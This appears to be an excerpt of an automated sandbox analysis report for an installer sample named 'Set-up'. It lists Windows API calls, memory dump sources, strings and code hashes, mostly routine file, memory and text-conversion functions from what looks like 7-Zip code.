                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000003,?,00000000,?,?,00000000), ref: 00409582
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateDirectory$H_prolog$ErrorLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 225019141-0
                                                                                                                                                  • Opcode ID: 4718fadee0e517aed5b0bf664f3f7b1d090dac9aa27d81c813e3270ad5ff2c18
                                                                                                                                                  • Instruction ID: 1f3bc6db0a728d9bfd055e8a0f8227e49f7bf46736af2f04f8af0ae3034628ab
                                                                                                                                                  • Opcode Fuzzy Hash: 4718fadee0e517aed5b0bf664f3f7b1d090dac9aa27d81c813e3270ad5ff2c18
                                                                                                                                                  • Instruction Fuzzy Hash: C611D373D04205EFDF11AFA69C814BEBB75EB44358F10007FE905B32D2CA395E418AAA
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperW.USER32(00000000,?,?,?,?,?,0040779C), ref: 0040756E
                                                                                                                                                  • GetLastError.KERNEL32(?,0040779C), ref: 0040757A
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000004,00000000,00000000,?,0040779C), ref: 00407595
                                                                                                                                                  • CharUpperA.USER32(?,?,0040779C), ref: 004075AE
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001,?,0040779C), ref: 004075C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$ByteMultiUpperWide$ErrorLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3939315453-0
                                                                                                                                                  • Opcode ID: 5542f8ac5b04411454b560831cebea15ee82a51659f749881e22f94b9f528b9a
                                                                                                                                                  • Instruction ID: e2d0110e49ed661a2d0575c7225b27184618cce7cf0535423ff90f521c82c0d9
                                                                                                                                                  • Opcode Fuzzy Hash: 5542f8ac5b04411454b560831cebea15ee82a51659f749881e22f94b9f528b9a
                                                                                                                                                  • Instruction Fuzzy Hash: 820156B68142197FDB106BA49CC9DEF7ABCEB05354F000872F502F3681E579AD80877A
                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(00000103,7FFFFFFF,004701CB,00470B72,00000000,?,?,00000000,00000001), ref: 0046DF05
                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0046DF13
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046DF5F
                                                                                                                                                    • Part of subcall function 0046FA13: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0046DF28,00000001,00000074,?,?,00000000,00000001), ref: 0046FB09
                                                                                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046DF37
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0046DF48
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2020098873-0
                                                                                                                                                  • Opcode ID: 2579a79d50f51303433f986a8350a333b6317c42f59056469be10e8e5a0e5b73
                                                                                                                                                  • Instruction ID: b9d2e50b28cd5dab27f8086af949c5e4f748ffd9d6768b06feacf392e28a1ef9
                                                                                                                                                  • Opcode Fuzzy Hash: 2579a79d50f51303433f986a8350a333b6317c42f59056469be10e8e5a0e5b73
                                                                                                                                                  • Instruction Fuzzy Hash: 3CF0F631E052115BD7342F70BC0961E3B91EF807B1B10053AF64AD62D0EF298C85C69F
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: :lc$:lp$:pb
                                                                                                                                                  • API String ID: 3519838083-1922261784
                                                                                                                                                  • Opcode ID: ca1f2c60a5208a8f3698a0098aa9724743d715620118023fe85d9fbb226ad630
                                                                                                                                                  • Instruction ID: 9ce720abd8e92f33691c04e9a9cf6f9c5341b053c52d22b97dd2bbbc08cd80e4
                                                                                                                                                  • Opcode Fuzzy Hash: ca1f2c60a5208a8f3698a0098aa9724743d715620118023fe85d9fbb226ad630
                                                                                                                                                  • Instruction Fuzzy Hash: 3A022830A00215DFCF20DF64D884BAEB7B1AF54304FA4856FE84667291D739AD56CB1B
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • There is no correct record at the end of archive, xrefs: 00438B03
                                                                                                                                                  • There are no trailing zero-filled records, xrefs: 00438AFC
                                                                                                                                                  • There are data after end of archive, xrefs: 00438B10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: There are data after end of archive$There are no trailing zero-filled records$There is no correct record at the end of archive
                                                                                                                                                  • API String ID: 3519838083-3898197850
                                                                                                                                                  • Opcode ID: da0eb0e3073f7ff0daa4c77dbd3b997b124db6e5823eaed5d400b611c53c7bc2
                                                                                                                                                  • Instruction ID: 08408d8d713d07cf92e4532a08f71d4e69ede2d4512bef54aeb43ac59318fafe
                                                                                                                                                  • Opcode Fuzzy Hash: da0eb0e3073f7ff0daa4c77dbd3b997b124db6e5823eaed5d400b611c53c7bc2
                                                                                                                                                  • Instruction Fuzzy Hash: 85D1A2719003199BDF14DF64C881BEEF7B5AF18304F1494AFF845AB282DB78AA45CB58
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                  • String ID: $ $M
                                                                                                                                                  • API String ID: 3732870572-1168433142
                                                                                                                                                  • Opcode ID: d30dab09a5f8b071494c043c5077002a98490f53a95e881200a74211b3e95980
                                                                                                                                                  • Instruction ID: aaf1ae1ddf447f5bccbb6bc6aed1fc9bf4189ca47e50831f8e33aa6f46a83ce2
                                                                                                                                                  • Opcode Fuzzy Hash: d30dab09a5f8b071494c043c5077002a98490f53a95e881200a74211b3e95980
                                                                                                                                                  • Instruction Fuzzy Hash: 2041C571B00B489BCB28DE69D8906AFBBF6EF88300F14457ED546E7780D7759908CB54
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: B$Z$h
                                                                                                                                                  • API String ID: 3519838083-418080759
                                                                                                                                                  • Opcode ID: 3ffe56fbc889e74c839c1029da755e8df845a9d8c945114bbb3e42ff9d28fdaa
                                                                                                                                                  • Instruction ID: 45672ff5436f30ece3f87d63813a26f6dff148f036e3dae11b68e8280a383418
                                                                                                                                                  • Opcode Fuzzy Hash: 3ffe56fbc889e74c839c1029da755e8df845a9d8c945114bbb3e42ff9d28fdaa
                                                                                                                                                  • Instruction Fuzzy Hash: AE21C471A00305AFDB20DF65C881BEEB7A4AF14704F10495FF9469B281D7B8E9448B59
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00405C36
                                                                                                                                                  • EnterCriticalSection.KERNEL32(004907B8), ref: 00405C4B
                                                                                                                                                    • Part of subcall function 00405DD6: __EH_prolog.LIBCMT ref: 00405DDB
                                                                                                                                                    • Part of subcall function 00408FB2: __EH_prolog.LIBCMT ref: 00408FB7
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(004907B8,?,?,?), ref: 00405CC7
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog$CriticalSection$EnterLeave
                                                                                                                                                  • String ID: WARNING:
                                                                                                                                                  • API String ID: 2490926211-3509524770
                                                                                                                                                  • Opcode ID: fe0a0d134ecd75967b63d6d63bbff9225859397271b1e75d9dce8f46fca18e28
                                                                                                                                                  • Instruction ID: a1007e8b492637971ac2983d98b960642e0ed6f4f578617c47cc1b15fa36776e
                                                                                                                                                  • Opcode Fuzzy Hash: fe0a0d134ecd75967b63d6d63bbff9225859397271b1e75d9dce8f46fca18e28
                                                                                                                                                  • Instruction Fuzzy Hash: B111C431D00509ABCB05BBA5D806AEEB775EF81318F10806FF005762D2CBBC1A16DB6A
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0046BBC0: RaiseException.KERNEL32(?,?,R@,?,?,?,0047D380,?,?,?,004052E0), ref: 0046BBEE
                                                                                                                                                  • GetProcAddress.KERNEL32(?,MAPISendDocuments), ref: 0041B37A
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041B387
                                                                                                                                                    • Part of subcall function 00408DDB: FreeLibrary.KERNEL32(00000000,?,00408E08,?,00000000,00000000,004907E0), ref: 00408DE5
                                                                                                                                                    • Part of subcall function 0041C3D2: __EH_prolog.LIBCMT ref: 0041C3D7
                                                                                                                                                    • Part of subcall function 0041B7B0: __EH_prolog.LIBCMT ref: 0041B7B5
                                                                                                                                                    • Part of subcall function 0041B780: __EH_prolog.LIBCMT ref: 0041B785
                                                                                                                                                    • Part of subcall function 0040FCA7: __EH_prolog.LIBCMT ref: 0040FCAC
                                                                                                                                                    • Part of subcall function 00402CA8: __EH_prolog.LIBCMT ref: 00402CAD
                                                                                                                                                  Strings
                                                                                                                                                  • MAPISendDocuments, xrefs: 0041B372
                                                                                                                                                  • 7-Zip cannot find MAPISendDocuments function, xrefs: 0041B38F
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog$AddressErrorExceptionFreeLastLibraryProcRaise
                                                                                                                                                  • String ID: 7-Zip cannot find MAPISendDocuments function$MAPISendDocuments
                                                                                                                                                  • API String ID: 2771415571-2393093766
                                                                                                                                                  • Opcode ID: 9a79d2e052b3b0944a602bc27a80f03295d8cad74558eacb9c9d8ab903e3556e
                                                                                                                                                  • Instruction ID: 63a737792763b54b17899fc60556db3708e683c7f68afbe8c55ec8a876f3be9f
                                                                                                                                                  • Opcode Fuzzy Hash: 9a79d2e052b3b0944a602bc27a80f03295d8cad74558eacb9c9d8ab903e3556e
                                                                                                                                                  • Instruction Fuzzy Hash: 9511C13080414CEADB05EBA5D9467DCBB70AF14308F60817FE852722D2DB781A94DB6A
                                                                                                                                                  APIs
                                                                                                                                                  • InterlockedIncrement.KERNEL32(00495F44), ref: 00471A43
                                                                                                                                                  • InterlockedDecrement.KERNEL32(00495F44), ref: 00471A58
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Interlocked$DecrementIncrement
                                                                                                                                                  • String ID: D_I
                                                                                                                                                  • API String ID: 2172605799-3136373921
                                                                                                                                                  • Opcode ID: ea3195717fe9035aec771e3e31c2e450e308b2b154779061212fb93636d15a67
                                                                                                                                                  • Instruction ID: 343d87672d15f9cffb3bfd1e75a11e9cb4baf1915ebd9b1d995eabf9e2a698a3
                                                                                                                                                  • Opcode Fuzzy Hash: ea3195717fe9035aec771e3e31c2e450e308b2b154779061212fb93636d15a67
                                                                                                                                                  • Instruction Fuzzy Hash: E4F0C2321063029FE721AF5AACC5ACF67A4EB81725F25843FF00895160CB6899828A5E
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetLargePageMinimum,004033CB,?,?,00000000,00000001,00000000), ref: 0045882A
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00458831
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: GetLargePageMinimum$kernel32.dll
                                                                                                                                                  • API String ID: 1646373207-2515562745
                                                                                                                                                  • Opcode ID: 3a7df8104397c82738d6523640b9e4866e0f85505ffc4a29cffa6132b902bd70
                                                                                                                                                  • Instruction ID: 5740486234f47604aa3fbed5c65f45a8bd59981bca25acc1dd5c97f975a53d11
                                                                                                                                                  • Opcode Fuzzy Hash: 3a7df8104397c82738d6523640b9e4866e0f85505ffc4a29cffa6132b902bd70
                                                                                                                                                  • Instruction Fuzzy Hash: 82D0A7B1641302C69B007FB19C0E73B3758EA50706380443FA814E2171EF28C004CA2D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1bb221b9a95fb7f4ca31475468497c99e8eb3f62489f540233c12b10f4f39474
                                                                                                                                                  • Instruction ID: 0a4e5e5323e6288327fb8a64a7218c7ed8f41d290677ad6958c5e9f416bf5f4e
                                                                                                                                                  • Opcode Fuzzy Hash: 1bb221b9a95fb7f4ca31475468497c99e8eb3f62489f540233c12b10f4f39474
                                                                                                                                                  • Instruction Fuzzy Hash: 83910672D00214AADF21AB69DC849AF7BB9EB48364F200127F494B6291F7398D40C76F
                                                                                                                                                  APIs
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00002020,0048DE78,0048DE78,?,?,0046F656,00000000,00000010,00000000,00000009,00000009,?,0046C4DF,00000010,00000000), ref: 0046F1AB
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,0046F656,00000000,00000010,00000000,00000009,00000009,?,0046C4DF,00000010,00000000), ref: 0046F1CF
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,0046F656,00000000,00000010,00000000,00000009,00000009,?,0046C4DF,00000010,00000000), ref: 0046F1E9
                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0046F656,00000000,00000010,00000000,00000009,00000009,?,0046C4DF,00000010,00000000,?), ref: 0046F2AA
                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,0046F656,00000000,00000010,00000000,00000009,00000009,?,0046C4DF,00000010,00000000,?,00000000), ref: 0046F2C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual$FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 714016831-0
                                                                                                                                                  • Opcode ID: 8087f2bfca9d503025f042f70a51b3b6999920a7e17187ad03716b80b29454ec
                                                                                                                                                  • Instruction ID: ba1f12bba68cf4acdd9bc314561366ab72bbdb844dce41ff866c2ae2dd219f5a
                                                                                                                                                  • Opcode Fuzzy Hash: 8087f2bfca9d503025f042f70a51b3b6999920a7e17187ad03716b80b29454ec
                                                                                                                                                  • Instruction Fuzzy Hash: FD3107B5A41B01DFD3309F24EC80B26B7A4E764764F10493BE5959B2D0F779A8448F4E
                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNEL32(00000003,00000003,00000000,00000003,00000000,?,00000002,00000000), ref: 00470F69
                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007370), ref: 00470F73
                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000001,00000003,00000000,?,00000002,00000000), ref: 00471039
                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007370), ref: 00471043
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                                  • Opcode ID: 2cc585ab597ad01a01dfad9020f2690889e466d38275e3b0ede9bf71359f175d
                                                                                                                                                  • Instruction ID: 9d746e993147214d5a2332e31db93adbe562cb9d8aee7da9d812ee40ac2ed53d
                                                                                                                                                  • Opcode Fuzzy Hash: 2cc585ab597ad01a01dfad9020f2690889e466d38275e3b0ede9bf71359f175d
                                                                                                                                                  • Instruction Fuzzy Hash: 5E51B3346042C5DFDF218F6CC880BEA7BB0AF12304F14C49BE8599B762D3799995CB5A
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409A00
                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000105,?,00000000,00000000,0047A410,00000000), ref: 00409ADA
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • GetFullPathNameA.KERNEL32(?,00000105,?,?,00000000,0047A410,00000000), ref: 00409A52
                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000001,?,00000000,00000003,?,00000105,?,00000000,00000000,0047A410,00000000), ref: 00409B3A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FullNamePath$H_prolog
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3081200611-0
                                                                                                                                                  • Opcode ID: 4c59ee69e0e36cab85bd991f8581f094e7d8d07a04ac3ad142a52dad17706e6c
                                                                                                                                                  • Instruction ID: 7146501a08d6027fff48b43c4e9eab51290b9d7e30f3f241cd9f8ca66e81a9f2
                                                                                                                                                  • Opcode Fuzzy Hash: 4c59ee69e0e36cab85bd991f8581f094e7d8d07a04ac3ad142a52dad17706e6c
                                                                                                                                                  • Instruction Fuzzy Hash: C6414571D00119ABCF14EFA5D8909EEB7B9FF48314F10407EE505B32A2DA786E45CB99
                                                                                                                                                  APIs
                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 0046FF77
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                  • Opcode ID: 0f92a8873e158599e04940a362c6e084964f23b0a974cf43dcfc5b1bc1e7f636
                                                                                                                                                  • Instruction ID: 959ecac357f90b6e94e115ad0648054278f424796ac0cfcceba33cec68e4b4b5
                                                                                                                                                  • Opcode Fuzzy Hash: 0f92a8873e158599e04940a362c6e084964f23b0a974cf43dcfc5b1bc1e7f636
                                                                                                                                                  • Instruction Fuzzy Hash: 6451AE31900248EFCB15CF68D980ADE7BB4FF42354F2085ABF9599B251E734DA44CB6A
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409404
                                                                                                                                                  • MoveFileW.KERNEL32 ref: 00409466
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • MoveFileA.KERNEL32(?,?), ref: 0040943A
                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 004094BD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileMove$H_prolog
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 853508918-0
                                                                                                                                                  • Opcode ID: 736d9f1afaeb037f8b31ed64d0f3b7106c0593550f732573afc36924af4a2274
                                                                                                                                                  • Instruction ID: e3512f0d833de681bd09933fb321b968525b37ccca3024f146b310d41422dadd
                                                                                                                                                  • Opcode Fuzzy Hash: 736d9f1afaeb037f8b31ed64d0f3b7106c0593550f732573afc36924af4a2274
                                                                                                                                                  • Instruction Fuzzy Hash: 67316D72C05119ABCF10EFA2D8419DEFB75AF44314F14417FE801B3292DA386E068B6A
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040AAB3
                                                                                                                                                    • Part of subcall function 0040AB7F: CloseHandle.KERNEL32(00000000,?,0040AAC3,000000FF,00000000,0040A5CF,?,0047A410), ref: 0040AB8A
                                                                                                                                                  • CreateFileA.KERNEL32(?,0047A410,?,00000000,0040A5CF,00000000,00000000,?,?,000000FF,00000000,0040A5CF,?,0047A410), ref: 0040AAF6
                                                                                                                                                  • CreateFileW.KERNEL32(?,0047A410,?,00000000,0040A5CF,00000000,00000000,?,?,000000FF,00000000,0040A5CF,?,0047A410), ref: 0040AB1A
                                                                                                                                                  • CreateFileW.KERNEL32(00000000,0047A410,?,00000000,0040A5CF,00000000,00000000,00000003,?,?,000000FF,00000000,0040A5CF,?,0047A410), ref: 0040AB59
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile$H_prolog$CloseHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 676520261-0
                                                                                                                                                  • Opcode ID: 86f4e81dc93824d7c46348972d9933c6224fd0ab569247d401f5cd845de6055a
                                                                                                                                                  • Instruction ID: dcb3871ed3aaa8bc079bef57250c330be7cd77665cfe38c32a438c7c710b4f7f
                                                                                                                                                  • Opcode Fuzzy Hash: 86f4e81dc93824d7c46348972d9933c6224fd0ab569247d401f5cd845de6055a
                                                                                                                                                  • Instruction Fuzzy Hash: F5216D7280020AEFCF11AFA4CC41DEEBB76FF18354F10852AFA55662A0C3359961DBA5
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004092B5
                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?,?,?,0047ADD8,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004092FA
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • SetFileAttributesA.KERNEL32(?,?,?,?,0047ADD8,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004092DB
                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?,00000003,?,?,?,?,0047ADD8), ref: 0040932F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile$H_prolog
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3790360811-0
                                                                                                                                                  • Opcode ID: c9461dcf8d122dd9941bf0465e5b9027c4103411b57b206f823c83a88d801f8f
                                                                                                                                                  • Instruction ID: 83891075d981374b52900cfa024e04e629bc59cc3293a3040c9dcaea295da159
                                                                                                                                                  • Opcode Fuzzy Hash: c9461dcf8d122dd9941bf0465e5b9027c4103411b57b206f823c83a88d801f8f
                                                                                                                                                  • Instruction Fuzzy Hash: 56119372D00205ABCF10AFA59C01AAFBB79EF88714F10447BED01B32D2D6385E45CBA6
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004097A0
                                                                                                                                                    • Part of subcall function 004092B0: __EH_prolog.LIBCMT ref: 004092B5
                                                                                                                                                    • Part of subcall function 004092B0: SetFileAttributesA.KERNEL32(?,?,?,?,0047ADD8,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004092DB
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,0047ADD8,?,00000003,?,00000000,00000000,004907E0), ref: 004097EC
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,?,0047ADD8,?,00000003,?,00000000,00000000,004907E0), ref: 004097CE
                                                                                                                                                  • DeleteFileW.KERNEL32(?,00000003,?,?,?,0047ADD8,?,00000003,?,00000000,00000000,004907E0), ref: 0040981D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$DeleteH_prolog$Attributes
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 750130383-0
                                                                                                                                                  • Opcode ID: 59ce6ae6250a74cf461dbcb047a61ae6a17c6e0c154726cb7cfbface33d0f927
                                                                                                                                                  • Instruction ID: cb9977e7b7d18198cc811f869ceeb51dadf8b7e3b2ba656bb1bca8becf47311c
                                                                                                                                                  • Opcode Fuzzy Hash: 59ce6ae6250a74cf461dbcb047a61ae6a17c6e0c154726cb7cfbface33d0f927
                                                                                                                                                  • Instruction Fuzzy Hash: AE11BF77D042059BCB10BFA588824AEBB71AF41314F14817FE90173292DB395E45DAAA
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,00491278,?,00000000), ref: 00456D12
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00456D2B
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000004,?,00000000), ref: 00456D54
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00456D6D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
